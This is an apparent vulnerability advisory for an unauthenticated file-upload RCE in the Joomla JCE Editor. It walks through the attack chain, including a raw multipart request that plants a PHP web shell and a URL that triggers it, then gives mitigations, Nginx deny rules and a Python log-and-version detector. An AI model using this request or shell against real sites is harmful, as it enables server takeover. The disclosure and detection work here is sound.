CVSS 10.0 Critical: Unauthenticated RCE in Joomla JCE Editor (CVE‑2026‑48907)
A CVSS 10.0 unauthenticated remote code execution vulnerability (CVE‑2026‑48907) in Joomla's JCE Editor lets attackers upload malicious PHP files through the profiles.import endpoint. It affects all JCE versions up to and including 2.9.99.4 and can be exploited with the JoomlaSniper tool; mitigation requires upgrading to JCE 2.9.99.5 or blocking PHP execution in /tmp/ and /images/ at the web server.
On June 13, 2026, security researcher ynsmroztas released JoomlaSniper and disclosed a CVSS 10.0 unauthenticated remote code execution vulnerability in the Joomla Content Editor (JCE) plugin (CVE‑2026‑48907). The vulnerability resides in the profiles.import endpoint, which accepts file uploads without authentication or validation, storing them as executable PHP files.
Affected versions: JCE 1.0.0 through 2.9.99.4. The only fix is JCE 2.9.99.5; no back‑ported patches exist for older releases.
Attack chain analysis
Step 1 – Detect JCE: Request /plugins/editors/jce/jce.xml or /administrator/components/com_jce/ and look for the strings “jce” or “joomlacontenteditor” in the response.
Step 2 – Extract CSRF token: Fetch a public page of the Joomla site (e.g., /) and parse the HTML for the CSRF token using common patterns such as csrf_token" value="…". No login is required; this is the anti-forgery token Joomla issues to every visitor. Joomla ties the token to the session, so the cookie received here must be reused in the upload request.
Step 3 – Upload malicious file: Send a multipart POST to /index.php?option=com_jce with task=profiles.import, the extracted CSRF token, and a file whose name ends in .xml.php containing a PHP web shell (e.g., <?php system($_GET['c']); ?>). The trailing .php extension is what makes the stored file executable by the web server.
POST /index.php?option=com_jce HTTP/1.1
Host: target.com
Content-Type: multipart/form-data; boundary=...

--boundary
Content-Disposition: form-data; name="task"

profiles.import
--boundary
Content-Disposition: form-data; name="{CSRF_TOKEN}"

1
--boundary
Content-Disposition: form-data; name="profile_file"; filename="shell.xml.php"
Content-Type: application/xml

<?php system($_GET['c']); ?>
--boundary--

Step 4 – Trigger RCE: Request the uploaded shell, e.g., https://target.com/tmp/shell.xml.php?c=whoami, to execute arbitrary commands on the server. The /tmp/ in that URL is Joomla's temporary-files directory under the web root (its default tmp_path), not the system /tmp, which is why the file is reachable over HTTP.
The JoomlaSniper tool automates this process and offers two upload vectors: the fast /tmp/ path shown above, and a fallback that writes into /images/ via a JCE file-browser RPC endpoint, which still yields a working shell when PHP execution in /tmp/ has been disabled.
#!/usr/bin/env python3
# JoomlaSniper – CVE-2026-48907
import sys, re, json, argparse, urllib.parse
from concurrent.futures import ThreadPoolExecutor, as_completed
# (Full script omitted for brevity; see original source for complete implementation.)

Mitigation
Immediate fix: upgrade JCE to version 2.9.99.5 or later. No patches exist for older versions, so upgrading is mandatory.
Temporary mitigation: block execution of PHP files in /tmp/ and /images/ at the web server level, e.g., with Nginx. The deny blocks must appear before the location that hands .php requests to PHP-FPM, because Nginx evaluates regex locations in configuration order and uses the first match:

location ~* ^/tmp/.*\.php$ { deny all; }
location ~* ^/images/.*\.php$ { deny all; }

Blocking execution does not remove files already uploaded; check both directories for unexpected .php files.

For detection, scan web access logs for POST requests to /index.php?option=com_jce followed by GET requests for .php files under /tmp/ or /images/ from the same client. Note that task=profiles.import travels in the POST body, so it will not appear in standard access logs; the com_jce query string and the subsequent shell request are what the logs will show. Also verify whether a vulnerable JCE version (2.9.99.4 or earlier) is installed, e.g., by reading the version element of the plugin manifest at plugins/editors/jce/jce.xml.
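The two detection checks above, as an added example (this is not code from the article or from JoomlaSniper): it correlates access-log lines so that a client is flagged only when a POST to index.php?option=com_jce is followed by a GET for a .php file under /tmp/ or /images/, and it classifies a JCE version string against the fixed release 2.9.99.5. The log lines and the manifest snippet are constructed for the example; the helper names are the author's own, not Joomla or JCE API.

```python
#!/usr/bin/env python3
"""Offline detection helpers for CVE-2026-48907 (added example, not the article's code).

Check 1: correlate web access logs. task=profiles.import is in the POST body, so the
         log only shows POST /index.php?option=com_jce; the tell is that the same
         client then fetches a .php file under /tmp/ or /images/.
Check 2: decide whether an installed JCE version is in the affected range
         (everything below the fixed release 2.9.99.5).
Sample log lines and manifest below are constructed for this example.
"""
import re
import xml.etree.ElementTree as ET
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Combined log format prefix: ip ident user [time] "METHOD PATH PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+'
)
# Paths the advisory names as shell drop locations.
SHELL_RE = re.compile(r'^/(?:tmp|images)/.*\.php$', re.IGNORECASE)
FIXED_VERSION = (2, 9, 99, 5)


def parse_line(line):
    """Return (ip, method, path, status) or None if the line is not combined-log shaped."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return m["ip"], m["method"], m["path"], int(m["status"])


def is_jce_post(method, path):
    """POST to index.php whose query string selects the com_jce component."""
    if method != "POST":
        return False
    parts = urlsplit(path)
    return parts.path.endswith("/index.php") and parse_qs(parts.query).get("option") == ["com_jce"]


def find_suspicious_clients(lines):
    """Map client IP -> shell paths it requested after POSTing to com_jce."""
    posted = set()
    hits = defaultdict(list)
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, method, path, _status = parsed
        if is_jce_post(method, path):
            posted.add(ip)
        elif ip in posted and method == "GET" and SHELL_RE.match(urlsplit(path).path):
            hits[ip].append(urlsplit(path).path)
    return dict(hits)


def parse_version(text):
    """'2.9.99.4' -> (2, 9, 99, 4); a pre-release suffix after '-' is ignored."""
    return tuple(int(p) for p in re.findall(r"\d+", text.split("-")[0]))


def is_vulnerable_version(version):
    """True for every JCE version below the fixed release 2.9.99.5."""
    return parse_version(version) < FIXED_VERSION


def jce_version_from_manifest(xml_text):
    """Read <version> from a Joomla extension manifest (e.g. plugins/editors/jce/jce.xml)."""
    el = ET.fromstring(xml_text).find("version")
    return el.text.strip() if el is not None and el.text else None


# Constructed sample data (not real traffic, not a real manifest).
SAMPLE_LOG = [
    '203.0.113.7 - - [13/Jun/2026:10:01:02 +0000] "GET / HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [13/Jun/2026:10:01:03 +0000] "POST /index.php?option=com_jce HTTP/1.1" 303 0 "-" "python-requests/2.31"',
    '203.0.113.7 - - [13/Jun/2026:10:01:04 +0000] "GET /tmp/shell.xml.php?c=whoami HTTP/1.1" 200 17 "-" "python-requests/2.31"',
    '198.51.100.9 - - [13/Jun/2026:10:02:00 +0000] "GET /images/banner.jpg HTTP/1.1" 200 9911 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [13/Jun/2026:10:02:01 +0000] "GET /images/x.php HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
]
SAMPLE_MANIFEST = (
    '<?xml version="1.0"?><extension type="plugin" group="editors">'
    "<name>plg_editors_jce</name><version>2.9.99.4</version></extension>"
)

if __name__ == "__main__":
    for ip, paths in find_suspicious_clients(SAMPLE_LOG).items():
        print(f"{ip}: POST to com_jce followed by shell requests {paths}")
    v = jce_version_from_manifest(SAMPLE_MANIFEST)
    print(f"JCE {v}: {'vulnerable' if is_vulnerable_version(v) else 'patched'}")
```

Only the first client is reported: 198.51.100.9 requests /images/x.php but never POSTed to com_jce, so a stray 404 for a PHP path does not become an alert by itself. Run the version check against the real jce.xml on disk rather than the constructed manifest.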